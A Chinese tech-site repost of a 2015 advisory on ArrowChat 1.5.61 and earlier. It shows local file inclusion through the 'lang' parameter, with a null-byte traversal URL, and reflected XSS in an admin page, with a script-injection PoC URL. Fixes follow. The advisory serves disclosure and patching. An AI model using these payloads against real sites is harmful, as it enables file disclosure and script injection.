精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

ArrowChat 1.5.61多重缺陷

2015-01-20 11:44 来源: 编辑:admin
标题: ArrowChat <=~ 1.5.61  Multiple vulnerabilities 作者: Kallimero 影响版本: 1.5.61, before, and maybe 1.6 测试系统: Debian   简介 ============   ArrowChat is a chat script, which is able to be integrate in various CMS, as wordpress, or some bulletin boards.     缺陷分析 ========     1- ) Local File Inclusion     external.php let us load langage, but not a secure way.   ---------------[external.php]---------------   // Load another language if lang GET value is set and exists if (var_check('lang')) {     $lang = get_var('lang');       if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"))     {         include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");     } } ---------------[index.php]---------------   Thanks to the nullbyte tricks we'll be able to include any php file, like that :   http://www.bitsCN.com /[path]/external.php?lang=../path/to/file%00&type=djs   2- ) reflected XSS   The administration layout is accessible for anyone. Even if we can't exec the php code of the admin, we can inject html thanks to $_SERVER['PHP_SELF']     Example : -------[admin/layout/pages_general.php]-----   <form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data"> ----------------------------------   PoC: http:// [site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>     How to Fix ? ============    To fix the LFI, you can replace it with :  // Load another language if lang GET value is set and exists   if (var_check('lang')) {     $lang = get_var('lang');     if(preg_match("#^[a-z]{2,5}$#i", $lang)){         if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"))         {             include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");         }     } }   lang will be include only if it's a valid lang file.   For the XSS's, you can use a .htaccess to protect the layout directory, and use htmlentities to avoid the html inj'.    
标签
你喜欢的文章
返回首页
扫描微信
返回顶部